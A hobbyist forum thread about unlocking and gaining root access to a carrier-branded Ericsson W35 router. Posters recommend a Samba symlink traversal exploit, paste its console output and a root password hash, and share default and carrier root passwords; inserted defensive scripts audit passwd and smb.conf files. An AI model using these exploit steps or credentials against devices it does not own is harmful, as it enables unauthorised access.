View Full Version : Debrand Ericsson W35 - Rogers Rocket Dock



BeianM
5th June, 2012, 12:50 PM
I'm in the UK & I have bought a second-hand unlocked Rogers branded Ericsson w35 mobile router.
Ericsson W35 Mobile Broadband Router, 3G Fixed Wireless Terminal, EDGE, UMTS, 3G, Gateway, HSUPA (http://www.ericssonw35.com/)
Although claimed to be unlocked it does not receive any network & I'm unable to select 'europe' in the menu as it is greyed out.
Has anyone managed to debrand this to the standard ericsson software? I did run the ericsson software on the Rogers but now I just get 'database is busy' when attempting login. So looking to flash it to a usable software somehow.

Jim.Mahoney
5th June, 2012, 07:26 PM
There are three versions of this device:

Tri-Band: 850/1900/2100 or 900/1900/2100

Quad Band: 850/900/1800/1900

The Quad Band does not offer 3G for UK/Europe which is on 2100MHz.

Either version of the Tri-Band unit will work in the UK.

The fact that Europe is not selected makes me think you have the Quad Band version...

I have no idea how you identify which version you have?

BeianM
5th June, 2012, 08:38 PM
Hi Jim, thanks for the reply.
The unit is both, depending on if you select 2g or 3g.
Take a look at the images.
It looks like it has been set up for 3g.co.uk. I have put a 3 sim in it & it says invalid sim, maybe it is not unlocked?
http://www.vtedit.com/router/Image2.jpg

http://www.vtedit.com/router/Image3.jpg

Jim.Mahoney
5th June, 2012, 08:49 PM
I'm not sure what you mean? It can't be both!

It's either Quad or Tri-Band both are 3G. The band is the frequency that it operates on... 3G is the technology it uses!

Jim.Mahoney
5th June, 2012, 09:09 PM
Just done some research and there is little chance of unlocking this device!

None of the normal GSM trade tools support this device. It might be worth trying E-Bay to see if anyone in the USA is selling unlock code...

BeianM
5th June, 2012, 09:15 PM
Sorry, I meant it appears set for three.co.uk
Looking at the image you can see that it is set for North America.
My guess is that if unlocked to accept any sim then maybe I can select 'europe' & then the 3g network. It also has 2g bands listed as you can see.
I expect either 2g or 3g is highlighted dependent on sim & country selected. I don't know, it is just a guess.

Jim.Mahoney
5th June, 2012, 09:41 PM
I'm not sure but it could be picking up the APN automatically, some devices now do this.

The only reference to unlocking I found was a guy suggesting flashing the software on the Ericsson website. I'd suggest reading through the info before you try this!!

Even if it were the non-Euro version, it should still give a signal albeit 2.5G (EDGE). Not very fast!

BeianM
6th June, 2012, 09:16 PM
Any chance of a link? I am looking at unlocking the sierra card on another site but don't have a mini-pcie card slot to put it into!

Jim.Mahoney
7th June, 2012, 08:57 AM
Try this:

How to UNlock Ericsson W35 | KWEKU AMPONSAH (http://kwekuamponsah.com/2012/01/06/how-to-unlock-ericsson-w35/)

BeianM
19th June, 2012, 12:48 PM
This guy is using a Huawei calculator for codes. The code does not work on my Rogers w35.
He talks of using the flash program to debrand it, at the end of the flash he says to plug the w35 into the pc via usb. Now that can only be done to my knowledge with a usb link cable. I have one of old & cannot find the drivers for it. I see it is possible to buy a cable that has the drivers integrated, but wondering if the w35 being a linux unit would make use of these drivers. I have put the flash on the stick & the w35 does poll the stick, is it possible that there is a Huawei bios type program that would flash this unit from the usb stick?
Inside is a Sierra Wireless air card mc8790v. Is my only chance of unlocking this by putting into a pc slot & using dc-unlocker?
I'm now reading the Huawei thread.
I never thought it would be so hard to do. I can't even buy an unlock code without going to Rogers.

Meat-Head
26th June, 2012, 08:43 PM
awesome thread.

is it possible to flip the lid off it, see if there are any other markings on the circuit board?

Rogers is a very big Emerican/Canadian company.

BeianM
29th June, 2012, 01:21 PM
Meathead! didn't know you branched out into mobile technology at MHM :)
Yes I have the case off & will post some pics. I'm thinking of getting a virgin ericsson unit to read the chip then blow these two I have. The guy in the link says to run the eric flash & then connect by usb when asked. This would need a usb link cable, he won't confirm this or any question about it other than issue unlock codes. I suspect that unbranded units are huoweeee but Roger doger has put their own unique algorithm for the code. Can't find anyone with this info. I have a mini pcie card en route so the air card can be put in my pc & with dc-unlocker I can work it out, but at £10 each!

Meat-Head
29th June, 2012, 01:42 PM
Meathead! didn't know you branched out into mobile technology at MHM :)
!


If it means hacking, or fraud or making money, we're there.

Just a thought, what about asking an Emerican DK member to call Rogers, in Emerica.

BeianM
29th June, 2012, 09:46 PM
Rogers want $50 for a code!!
I put the wireless card in this new adapter & guess what, the ~~~~in pc won't start with it in the slot.

BeianM
18th July, 2012, 08:46 PM
I have a code & unlocked the operator lock. But it won't let me select a country? Maybe I need a rogers sim to start with. Anybody?

westofanywhere
3rd August, 2012, 01:09 AM
The W35 runs linux. As you might expect, there are a functionally rich set of cli tools to set up, configure and determine the status of the W35. Included in these tools are configuration functions which set up the country, operator and cellular functionality for the device.

The key is that you need cli access as user "operator" or "root" via telnet or ssh2 to perform these functions. I should point out as well that the W35 cli functionality is documented in the W35 System Admin Guide, which used to be available from the Ericsson FWT website. I don't know where it can be obtained now, but I do have a .pdf copy of this document on my PC.

You should also be aware that both the Rogers W35 RocketHub and the Bell W35 TurboHub originally ran the same R13A version of the W35 firmware dated Oct 16, 2009. Bell eventually issued a firmware update R13B dated Nov 18, 2010.

The W35 System Admin Guide of which I have a copy is for the R12 release of the W35 firmware.

So, the long and the short of it is, that if you can figure out how to access linux on the W35 as root, you will likely be able to configure the device to the full extent of its capabilities. And yes, the W35 System Admin Guide does mention that there are three different versions of the W35: "There are different models of the Ericsson W35 available each supporting different combinations of frequency bands; 850/1900/2100 MHz, 900/1900/2100 MHz and 2100 MHz only." I have not yet determined how you can tell which variant is which, other than by using it. Could it be that the device has hardware differences to accommodate those three variants?



westofanywhere

westofanywhere
3rd August, 2012, 01:15 AM
Just a post script to my previous posting: as a newbie here, I just noticed that I could upload a file to Digital Kaos for access by all. I would not have any problems uploading the .pdf of the W35 System Admin guide. But I would like to have it clarified as to what the legal and copyright issues might be. Would this be a problem either to this site, or potentially to whomever now owns the copyright to the document?

westofanywhere

Meat-Head
3rd August, 2012, 07:11 AM
just upload the pdf and just say you're a new member if any comeback lol

welcome to dk the world's best website.

are you from emerica?

westofanywhere
3rd August, 2012, 12:32 PM
From Canada, eh!

The .pdf of the W35 System Admin document is almost 2.5Mb in size. It is too big to upload, based on the max file sizes for .pdf that I see in the upload window.:playingball:

TIA

westofanywhere
5th August, 2012, 01:38 PM
Here is the W35 Sys Admin file as a zipped .pdf file.

Enjoy!

DjohnB
2nd September, 2012, 12:07 AM
G'day, Firstly, thanks for putting the Administrators Guide up for people to download.
Had anybody gleaned anything from this file such as what setting to change IF you can get into it?
Cheers
DjohnB

Vechinus
3rd September, 2012, 03:51 PM
Inside is a Sierra Wireless air card mc8790v. Is my only chance of unlocking this by putting into a pc slot & using dc-unlocker?

Hello
The Sierra Card inside mc8790v is unlocked!!!
I inserted it in my notebook, installed drivers from SierraWireless and it worked fine with any network.
The internal CD of the card is turned off.

westofanywhere
5th September, 2012, 01:36 AM
The question was posed as to what commands would allow one to change the Region for which the W35 was functional. The following command is found on p 29:

5.1.1 Set PRL Region
To set a PRL region, the following command is used:
$ cf set cellular.prl_region <region>
$ cf commit
The <region> is an integer in the interval 0-255 and current valid values are:
0 - No regional preference/no region defined
1 - Europe / Rest of the World.
2 - North America.
3 - Australia.
4 - Japan.
6 - H3G, W2100, G900/1800



The Rogers W35 web-based management interface must be customized to lock out certain functionality and parameter changes. I can only guess how this is accomplished. For sure, the web interface on my Rogers W35 has a number of options grayed out. How specific this is to the Rogers W35, I do not know.

What I do know is that the Bell Canada W35 TurboHub originally used the same firmware based on version number and release date. Bell W35 users encountered frequent internet disconnects and Ericsson issued an updated firmware which Bell has available on its website:

How to update the software on my Ericsson W35 Turbo Hub (http://support.bell.ca/Mobility/Smartphones_and_mobile_internet/How_to_update_the_software_on_my_Ericsson_W35_Turbo_Hub)

Rogers has not issued any firmware updates for the W35.

westofanywhere

Akofa
5th October, 2012, 03:20 PM
Is there a way to completely replace firmware for the w35?

westofanywhere
7th October, 2012, 10:45 PM
@Akofa:

you are probably familiar with the saying "where there is a will, there is a way...". So, I am sure it could be done.

Judging by the following W35 Event Log contents,

Oct 16 19:51:27 (none) user.notice kernel: klogd started: BusyBox v1.10.2 (2009-10-16 19:55:11 CEST)
Oct 16 19:51:27 (none) user.notice kernel: Linux version 2.6.23.14 (erajmsa@selix011.lmera.ericsson.se) (gcc version 3.4.3 (MontaVista 3.4.3-25.0.70.0501961 2005-12-18)) #1 Fri Oct 16 19:51:15 CEST 2009

the W35 runs BusyBox, which I understand to be a specialized, compact packaging of Linux.

So, someone who had the desire and the technical abilities could reverse-engineer a firmware package for the W35 to do whatever, just like has been done with DD-WRT and Tomato for certain Linksys routers, and others.

But at this point it would seem more useful and effective, to use more conventional "penetration" techniques to access the W35 at root and thus gain access to its full design capabilities as initially provided by Ericsson.

There are as yet no indications by anyone that the device itself is lacking in functionality. The main issue is that we cannot access that functionality that we know to be there.

This just appears to me to be part of an ongoing strategy on the part of carriers to sell us these devices. But by blocking root access they ham-string us, the owners, primarily for their own self-centered reasons.

westofanywhere

kobiss
9th October, 2012, 02:11 AM
Please, someone help me here. After upgrading my router w35, this is what comes up. Any help..


The system database cannot be accessed right now, since it is locked.
Please wait and retry later.

jps44
10th October, 2012, 03:33 PM
westofanywhere and friends:

In case you are interested in getting into your w35, here are a few hints.
Get metasploit framework and use samba symlink traversal exploit.
Usb stick in w35 must be formatted to ext2.
You can then browse the file system.

In the passwd file we find the hash of root password. In my case it was: (including period)

$1$QeUoekTR$NtbPHdFKR/rz372mzYVyt.

Need help with the next step.
PM me if you have advice.
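
[Added example, not part of jps44's post.] The root entry quoted above starts with $1$, the MD5-crypt scheme, and it sat in the world-readable passwd file rather than in a shadow file. The sketch below audits passwd-format text for both conditions; the function names, the scheme table and every sample line other than the root hash quoted in the post are constructed for illustration.

```python
"""Audit passwd-format text for password hashes that are exposed or weakly hashed."""

# crypt(3) scheme identifiers and whether the scheme is still acceptable.
SCHEMES = {
    "1": ("MD5-crypt", False),
    "2a": ("bcrypt", True),
    "2b": ("bcrypt", True),
    "2y": ("bcrypt", True),
    "5": ("SHA-256-crypt", True),
    "6": ("SHA-512-crypt", True),
    "y": ("yescrypt", True),
}

# Constructed sample. Only the root hash is the value quoted in the post;
# the other accounts, uids, home directories and shells are made up.
SAMPLE_PASSWD = """\
root:$1$QeUoekTR$NtbPHdFKR/rz372mzYVyt.:0:0:root:/root:/bin/sh
operator:x:500:500:operator:/home/operator:/bin/sh
nobody:*:65534:65534:nobody:/var:/bin/false
guest::501:501:guest:/tmp:/bin/sh
"""


def classify_hash(field):
    """Return (scheme_name, acceptable) for the password field of one entry."""
    if field == "":
        return ("empty password", False)
    if field == "x" or field.startswith(("!", "*")):
        return ("shadowed or locked", True)
    if field.startswith("$"):
        parts = field.split("$")  # "$id$salt$hash" -> ['', id, salt, hash]
        if len(parts) >= 4 and parts[1] in SCHEMES:
            return SCHEMES[parts[1]]
        return ("unknown modular scheme", False)
    if len(field) == 13:
        return ("DES-crypt", False)
    return ("unrecognised", False)


def audit_passwd(text):
    """Return one finding per entry that exposes a hash or uses a weak one."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            findings.append({"line": lineno, "user": None,
                             "issues": ["malformed entry"]})
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        scheme, acceptable = classify_hash(pw)
        if scheme == "shadowed or locked":
            continue
        issues = []
        if pw:
            # Any real hash here is readable by every local user and by
            # anything that can read files off the box (e.g. a file share).
            issues.append("hash stored in world-readable passwd file")
        if not acceptable:
            issues.append("weak or missing hash: " + scheme)
        if uid == "0":
            issues.append("account has uid 0")
        findings.append({"line": lineno, "user": user, "issues": issues})
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding["line"], finding["user"], "; ".join(finding["issues"]))
```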

westofanywhere
11th October, 2012, 08:55 PM
@kobiss:

you say you "upgraded" the firmware of your W35. What firmware were you originally running/what carrier/provider sold you the W35? Where did you get the firmware "upgrade" from, and what version was it?

These are all pretty much required pieces of information in order for us to determine what happened to your unit.

westofanywhere

kcmconnect
30th October, 2012, 06:10 PM
I got this given to me by someone that had no idea what they were doing. I think they upgraded the FW and now I can't login to the WUI. I get the error saying the system DB can't be accessed as it is locked. Anyone have any suggestions?

Also, tks for the manual.

kcmconnect
30th October, 2012, 06:12 PM
@westofanywhere. I think it was the firmware from the Ericsson site. w35-006-R12C003.arc (http://ericssonw35.com/firmware/w35-006-R12C003.arc)

westofanywhere
30th October, 2012, 08:25 PM
@kcmconnect:

you do not mention what was the version/release of your original firmware before your attempted upgrade. But please note that the filename of the firmware on the Ericsson site indicates it is a Release 12.
I know that both Bell Canada and Rogers sold W35s which use firmware which is Release 13. Bell Canada did issue an updated firmware which can be found here:

How to update the software on my Ericsson W35 Turbo Hub (http://support.bell.ca/Mobility/Smartphones_and_mobile_internet/How_to_update_the_software_on_my_Ericsson_W35_Turbo_Hub)

I have read a number of other reports by individuals who attempted upgrades with the firmware from the Ericsson site. They reported similar results to you. No one, to the best of my knowledge, ever posted instructions for recovering their W35 from that state. If someone has, in fact recovered from an attempted upgrade with the R12 Ericsson firmware, please post your recommendations here on how to recover and regain control/use of the W35.

kcmconnect
31st October, 2012, 04:19 AM
I have confirmed that it was at V13 previous to the failed upgrade. I have tried the Metasploit method, however it appears as though the smb share is not write accessible with the default user. Anyone have an idea of a user that would gain me write access to the share? Here is my console output:


Connecting to the server...
Trying to mount writeable share '0041541b-'...
Trying to link 'rooted' to the root filesystem...
[-] Auxiliary failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=50 WordCount=0)
[-] Call stack:
[-] C:/metasploit/apps/pro/msf3/lib/rex/proto/smb/client.rb:215:in `smb_recv_parse'
[-] C:/metasploit/apps/pro/msf3/lib/rex/proto/smb/client.rb:1621:in `trans2'
[-] C:/metasploit/apps/pro/msf3/lib/rex/proto/smb/client.rb:1742:in `symlink'
[-] C:/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/samba_symlink_traversal.rb:67:in `run'
Auxiliary module execution completed
msf auxiliary(samba_symlink_traversal) >


I am confident that with the hashes I might get somewhere. Otherwise I'm open to other options as well.

What's the possibility of TTL / RS232 interface or JTAG? I noticed that there are pogo pads (5 of them) on the back side of the router daughter board. There is a cutout on the front of the unit to allow access to these pogo pads with the router board installed, which leads me to believe they are for debug / diagnostic purposes. The unit does not post without the router board installed.

I have taken basic readings and have come up with the following values:

1 2 3 4 5

pad 1 = 3.3v
pad 2 = GND
pad 3 = 3.3v
pad 4 = GND
pad 5 = 0.3V

anyone care to take a guess?
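
[Added example, not part of kcmconnect's post and not code from Samba or Metasploit.] On the failed run earlier in this post: the samba_symlink_traversal module needs a share it can write to, and it only works where Samba follows symlinks out of the share, which takes wide links together with unix extensions. The sketch below checks an smb.conf for shares left in that state; the sample config, share names and the rule that unset options fall back to the old permissive defaults are assumptions made for illustration.

```python
"""Flag smb.conf shares where Samba will follow symlinks out of the share."""

TRUE = {"yes", "true", "1"}
FALSE = {"no", "false", "0"}

# Assumption: options missing from the file take the permissive defaults of
# old Samba builds, the conservative reading for unpatched embedded firmware.
LEGACY_DEFAULTS = {
    "wide links": True,
    "unix extensions": True,
    "follow symlinks": True,
    "read only": True,
    "guest ok": False,
}

# smb.conf synonyms: canonical option name and whether the value is inverted.
SYNONYMS = {
    "writeable": ("read only", True),
    "writable": ("read only", True),
    "write ok": ("read only", True),
    "public": ("guest ok", False),
}

# Constructed sample configuration (share names and paths are made up).
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   unix extensions = yes

[usb]
   path = /mnt/usb
   writeable = yes
   guest ok = yes

[docs]
   path = /srv/docs
   read only = yes

[hardened]
   path = /srv/safe
   writeable = yes
   wide links = no
"""


def parse_smb_conf(text):
    """Return {section: {canonical boolean option: bool}} for an smb.conf."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key = " ".join(key.lower().split())  # option names ignore case/spacing
        value = value.strip().lower()
        if value not in TRUE | FALSE:
            continue  # only boolean options matter for this check
        flag = value in TRUE
        if key in SYNONYMS:
            key, invert = SYNONYMS[key]
            flag = (not flag) if invert else flag
        sections[current][key] = flag
    return sections


def audit_shares(text):
    """Return findings for shares that follow symlinks outside their path."""
    sections = parse_smb_conf(text)
    glob = sections.get("global", {})

    def effective(share, option):
        # Share setting wins, then [global], then the assumed legacy default.
        return share.get(option, glob.get(option, LEGACY_DEFAULTS[option]))

    # "unix extensions" is a global-only option.
    unix_ext = glob.get("unix extensions", LEGACY_DEFAULTS["unix extensions"])
    findings = []
    for name, share in sections.items():
        if name == "global":
            continue
        escapes = (unix_ext and effective(share, "wide links")
                   and effective(share, "follow symlinks"))
        if not escapes:
            continue
        writable = not effective(share, "read only")
        findings.append({
            "share": name,
            # Writable: a client can plant the link itself. Read-only: only
            # links that already exist on disk are followed out of the share.
            "severity": "high" if writable else "medium",
            "guest": effective(share, "guest ok"),
        })
    return findings


if __name__ == "__main__":
    for f in audit_shares(SAMPLE_SMB_CONF):
        print(f["share"], f["severity"], "guest" if f["guest"] else "auth")
```

Setting "wide links = no" or "unix extensions = no" in [global] clears every finding in the sample.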

abeiku12
3rd November, 2012, 08:51 AM
Getting the "root" password is the main aspect. Getting the manual too is another.

abeiku12
3rd November, 2012, 09:01 AM
Is there a way to update or flash the firmware via CLI mode or let the device fetch a compatible firmware from an ftp site?? Am out of luck here.

westofanywhere
4th November, 2012, 04:41 AM
@abeiku12 & others:

as you mentioned, getting the root password, and gaining access to the cli is the key.
I was just reading the W3x Administrators Guide, and it describes various ways of updating the firmware, as well as ways of recovering from an unsuccessful update attempt. To quote that document:
"The Ericsson W3x runs Linux OS. The flash file system is formatted as two partitions, each capable of holding a complete software image. If a software update process should get interrupted, e.g. power failure during the update process, there is always a last known good firmware image to boot from.
Software updates can be performed either manually using the FTP or HTTP(s) protocols, or automatically using TR-069 (CWMP)."

Of course, cli access seems to be required in order to perform the recovery.

Also mentioned is that a software update can be done via cli commands from a file on a USB stick:
"Manual software updates is supported from FTP or HTTP(s) servers using the swinst command. The swinst command can also get the image file from the local file system. The local file system includes whatever is mounted as USB storage. For example, the software image can be put on a USB memory stick which then is inserted into the Ericsson W3x."

So, for those of you who have the problem of recovering from an unsuccessful "upgrade" using the R12 firmware release currently available from the Ericsson site, I would first try to get into the cli using the published default username/password combinations to see if you can get cli access:
"The factory default settings for the unit define .... user IDs:
root with initial password feb.07
operator with initial password -cpeps"

This may be a "long shot", but according to the Administrators Guide, applicable to the R12 release. So, try it and see what happens. The Administrators Guide .pdf is available earlier in this thread as a download.

The information relating to updating firmware from the cli, etc., can be found in the "Management Tools" chapter beginning on page 90.

So, give it a try. Let us know if it works.

Good Luck!

westofanywhere

suburbia
22nd November, 2012, 08:29 AM
Hi all, is the root password the same for all devices?

Has anyone cracked the posted password provided?

Also, anyone figured out how to de-brick a W35?

Thx!

westofanywhere
24th November, 2012, 05:59 PM
I doubt that the root password would be the same for W35's from different carriers. That would sort of defeat the purpose of basic security for the device. But until we actually have those passwords available, we won't know.

No one has yet admitted to, or boasted of, successfully cracking the password file posted earlier in this thread.

I have not seen any directions for debricking the W35. If anyone knows how, we hope they would share their knowledge.

westofanywhere

westofanywhere
1st December, 2012, 04:24 PM
@All:

we have been discussing the "debranding" of the Ericsson W35. Attention has been primarily directed at obtaining root access to the Linux/Busybox OS which the W35 uses. But do we understand and accept the consequences of success here?

Recently I received a report on mobile phone malware from Sophos, a security organization, at the following URL:

http://www.sophos.com/en-us/medialibrary/Gated%20Assets/white%20papers/Sophos_Malware_Goes_Mobile.pdf

As I read this report, I could not help but think of the consequences of "debranding" the W35. I had cause to reflect on several issues relating to malware and device security which were mentioned in this report:

1. Many older mobile devices will not receive firmware updates issued by their vendors. As a result, functional, security and other problems which are currently known in the existing firmwares will likely never be resolved.

The W35 now appears to be such a "dormant" device. The vendor is not issuing firmware updates, and has not for some time. I suspect that without vendor (Ericsson) support no carrier who has provided the W35 to its customers will have the ability to develop independently a firmware update. Given the changes in technology over time there would seem to be little incentive as well to develop or issue any updates.

2. "Unlocked" and/or "jailbroken" mobile devices can represent potential security risks to the networks (LAN) to which they connect. The user/owner of the mobile device is now responsible for the mobile device security, and how well will this be done, and what security "policies" will the owner/user follow? As well, jailbroken mobile devices are significantly more prone to being affected by malware.

The Sophos report concludes that jailbroken mobile devices (in this case primarily smart phones) should not be allowed on corporate networks as they represent a security risk and a significant risk as being hosts for malware.

Now, how does this apply to us, who are dealing with the W35?

So, ask yourself these questions: if we get to know the root password for the W35, will we be responsible holders of this information, and put our own strong security in place?

Can we correct the known security problems which exist in the current Linux firmware on the device?

Could we possibly create and issue firmware updates containing the required corrections as and when we successfully develop and test them?

The W35 CLI seems like it has quite a few powerful capabilities the exercise of which could negatively affect the cell network to which the W35 connects. Once we know the root password, will we be able to exercise our new-found powers correctly and responsibly, and not affect negatively either the cell network, or other customers on the cell network?

As for malware, well, could there be malware infections possible for a jailbroken W35?

westofanywhere

Flaggmann
7th December, 2012, 04:17 PM
The W35 runs linux. As you might expect, there are a functionally rich set of cli tools to set up, configure and determine the status of the W35. Included in these tools are configuration functions which set up the country, operator and cellular functionality for the device.

The key is that you need cli access as user "operator" or "root" via telnet or ssh2 to perform these functions. I should point out as well that the W35 cli functionality is documented in the W35 System Admin Guide, which used to be available from the Ericsson FWT website. I don't know where it can be obtained now, but I do have a .pdf copy of this document on my PC.

You should also be aware that both the Rogers W35 RocketHub and the Bell W35 TurboHub originally ran the same R13A version of the W35 firmware dated Oct 16, 2009. Bell eventually issued a firmware update R13B dated Nov 18, 2010.

The W35 System Admin Guide of which I have a copy is for the R12 release of the W35 firmware.

So, the long and the short of it is, that if you can figure out how to access linux on the W35 as root, you will likely be able to configure the device to the full extent of its capabilities. And yes, the W35 System Admin Guide does mention that there are three different versions of the W35: "There are different models of the Ericsson W35 available each supporting different combinations of frequency bands; 850/1900/2100 MHz, 900/1900/2100 MHz and 2100 MHz only." I have not yet determined how you can tell which variant is which, other than by using it. Could it be that the device has hardware differences to accommodate those three variants?



westofanywhere
Has telnet access been disabled in these w35 units, i.e. telnet in using root@192.168,etc.etc?

westofanywhere
7th December, 2012, 05:16 PM
telnet is enabled, but we do not know the root password and hence any log in attempts are unsuccessful.

westofanywhere

Flaggmann
8th December, 2012, 04:14 PM
R13A version of the W35 firmware dated Oct 16, 2009. Bell eventually issued a firmware update R13B dated Nov 18, 2010.

The original OEM firmware admin manual specified a root password of 'feb.07' I believe; if the upgrades hold true to same pattern one might try 'oct.09' and/or 'nov.10' possibly. I haven't got the unit handy to try right now but intend to try that.

When I got the unlock code from the original ISP, at a cost of $50, they would not just give me the code, I had to be online, viewing the WebGui control page of the W35 on the "enter the code" page. While on that page I was put on hold many times with little or no explanation and during one discussion they asked for the new ISP company name, which is not req'd from my privacy perspective; when I objected to giving that info out they then just insisted on knowing the region it will operate in. This appears to be related to the customizing of the frequencies and band options, and it appears on unlocking that as soon as it was unlocked, the databases were locked so that any use of the machine was rendered impossible without the root password.

It struck me as odd that they insist on having it online and active before they would just give me a code to write down and use myself. I suspect there was some form of tftp taking place transparent to me and that was the reason for the question about regions of use/ISP.

It is a little like buying a car from mfr #1, and two years later trading it in on one from mfr #2, but needing a technical release to do so, mfr #1 disables the ecm module so that the trade in value at mfr #2 is gone out of spite for you following free enterprise theory of competition and going elsewhere.

Rogers was original ISP

I subsequently did a firmware reinstall to mfr's original download package and db still locked and root password did not get changed with the ericsson firmware install it appears

westofanywhere
9th December, 2012, 02:38 PM
@Flaggmann:

I just tried your suggestion on my W35. Using "oct.09" did not work as root password. Several other variants of that theme failed as well.

I remember trying that some months ago, and having it fail. Actually, it makes sense that an ISP would not make their root password for the device quite so obvious.

You state: "...and it appears on unlocking that as soon as it was unlocked, the databases were locked so that any use of the machine was rendered impossible without the root password." I'm not sure what you mean by that. Would you mind explaining?

You also wrote:

"It struck me as odd that they insist on having it online and active before they would just give me a code to write down and use myself. I suspect there was some form of tftp taking place transparent to me and that was the reason for the question about regions of use/ISP."

The requirement to have the device online could be for a number of reasons I can think of, including so they could access the device to confirm device parameter settings, or to change them as required.

Certainly, the device settings would need to reflect the geographic location in which it is to be used as cell networks differ from continent to continent and amongst carriers.

In general the whole concept of "ownership" of technological devices is being redefined to mean "right to use", with the selling company retaining rights of ownership of the "intellectual property" which is at the heart of the device.

You make reference to the automotive world. Today, our automobiles depend on a quite sophisticated computer, as you mention, the ECM. There has been ongoing a major dispute over who has the right to use the diagnostic and monitoring capabilities of the ECM. The automotive companies wanted to hold onto the rights to use the ECM capabilities so that we would need to go to one of their dealers to have problems diagnosed and repaired.

So, it would appear that the owner of the automobile has the "right to use". But beyond that access to the technology is again controlled by the manufacturer as much as possible.

I do not expect the equivalent of a DD-WRT or tomato firmware for the W35 to appear anytime soon, if only because the W35 connects to the cell networks owned by the carriers, rather than the less complex and benign SOHO LAN environments.

westofanywhere

rickwr88
15th January, 2013, 03:14 PM
Hello everyone. I am new on this forum, I have read the FAQ but if I am making any mistake please forgive me. Since I didn't do my research properly before, I am now in the same trouble as Kobiss and Kcmconnect, so is there someone who has come up with a solution on how to recover from a bad firmware upgrade, following the last westofanywhere suggestion on 3rd November, 2012? I've worked on it my way and nothing good came out but I am not the best at it. So if someone has something that we didn't try yet please tell us.

Thank you all for those precious information.

rickwr88
16th January, 2013, 04:03 PM
I am at a dead end now. I've tried to log in with telnet and SSH but nothing works. I tried all user IDs and passwords I've found in the administrator guide and that didn't work.
Has someone been through this before? Help me someone please.
Anything can help.
Thank you
rickwr88

twinsoris
22nd January, 2013, 06:49 PM
For me, I managed to secure a root password from a friend in Ghana, but after unlocking the Ericsson W35 using the Telnet commands it is unlocked and detects other operators, but the problem is that I cannot change the APN of the main ISP, which is ZAIN or AIRTEL from GHANA.
I even upgraded the W35 firmware, which is 12C of April 2009 from the Ericsson website, which went successfully, but note that when upgrading the firmware you need to have a lot of patience as this may take 5 to 15 minutes, so you don't need to be in too much of a hurry.
My problem is how can I change the APN from INTERNET to another network APN.

bgadbois
26th January, 2013, 04:43 PM
I am trying to access the command line access on my w35.
I need the operator password and/or the root password.
Can anyone help?

rickwr88
30th January, 2013, 09:44 PM
I am trying to access the command line access on my w35.
I need the operator password and/or the root password.
Can anyone help?

Hey bgadbois, there is an administrator guide on page 2 of this thread.
For the operator mode is:
user id: operator
password: -cpeps

administrator mode is:
user id: root
password: feb.07

Hope it helps :bird:

atison10
1st February, 2013, 11:31 PM
why you can't download

http://www.vtedit.com/router/Image3.jpg

pardors
7th February, 2013, 05:23 AM
I can't get an SSH client to stay open even with a valid username and password ("user" : password for web interface). It accepts the credentials, welcomes me to the w35 and then...nothing. Any tips on using PuTTY to connect as user?

Thanks

pinsull
8th March, 2013, 04:51 PM
In Canada here, I have acquired two used W35s as spares for ones we have in service on the Rogers network.
One was originally on Rogers contract and is branded so on the front. The other was on a Bell contract, and is labelled Bell on the back only, and of course will not accept a Rogers SIM.
Curiously on the ex Bell unit, the user interface is branded Rogers...ie when you access 192.168.1.1 on the unit you see a Rogers title block even whilst using a valid Bell SIM !!!
Anyone have any ideas about this?

niddnet
3rd April, 2013, 07:34 PM
Just for clarity - I have a couple of these devices - only the older versions, and unbranded (W21 and W25) - I've just upgraded to the latest firmware for these devices (R12C) from ericssonw25.com - and the root / operator passwords etc are as stated:

For the operator mode is:
user id: operator
password: -cpeps

administrator mode is:
user id: root
password: feb.07

So I would imagine, from a factory reset, with the manufacturer firmware, the above credentials will work. Of course, I can't comment if there are any carrier-fudged firmwares...

zenaze
6th April, 2013, 10:28 PM
thanks very much pls we need more info

zenaze
6th April, 2013, 10:36 PM
For me, I managed to secure a root password from a friend in Ghana, but after unlocking the Ericsson W35 using the Telnet commands it is unlocked and detects other operators, but the problem is that I cannot change the APN of the main ISP, which is ZAIN or AIRTEL from Ghana.
I even upgraded the W35 firmware, which is 12C of April 2009 from the Ericsson website, which went successfully, but note that when upgrading the firmware you need to have a lot of patience as this may take up to 5 to 15 minutes, so you don't need to be in too much of a hurry.
My problem is how can I change the APN from INTERNET to another network's APN.

Boss, I am also from Ghana using the Zain W35 router. Can you please tell me the root password or how you managed to unlock yours... thank you

solawd
15th May, 2013, 07:03 PM
Just What I was looking for. I know I am not supposed to reply with thanks, so I will find some other way.

dompreh2g
17th August, 2013, 09:45 AM
Do you care to give us the root password.
Am still trying to unlock my ericsson w35

westofanywhere
20th September, 2013, 12:30 AM
@BeianM:

I know this has been a long time since your original posting, I discovered, with someone else's help, how to unlock the Rogers version of the W35.

A posting just appeared in the Rogers Forum which provided the essential information:

If anyone is still interested you can access the cli with user : root
Pswd : R0ger5

Now to unlock the unit:
You should now see a screen stating "Welcome to Ericsson".
Now type the command "rwclean files". Press Enter. After this, you will be instructed to reboot the W35. At this point all the formerly entered parameters and data, both user and network provider-specific, have been wiped.


Now you have an unlocked unit and you will be able to access the CLI commands as you find them in the administrator's manual.

westofanywhere

kaoru4aoi
19th October, 2013, 08:36 PM
Hi,

New to DK and new to this thread. I have a Rogers rocket hub (branded to Rogers) on my boat since 2009. I recently began to "cut the cord" with Rogers since my telecom bill is more than my electric bill. Given this, I've been trying to unlock/debrand my Ericsson W35 since replacing would be problematic. The previous post is encouraging and I'm going to give it a try since I have no recourse. I've already talked to Rogers about unlocking and they say that they can't do it. All my avenues are closed and buying an unlocked replacement is too expensive. First up is to get the admin manual.

Cheers,
Kaoru

westofanywhere
20th October, 2013, 03:25 AM
@Kaoru:

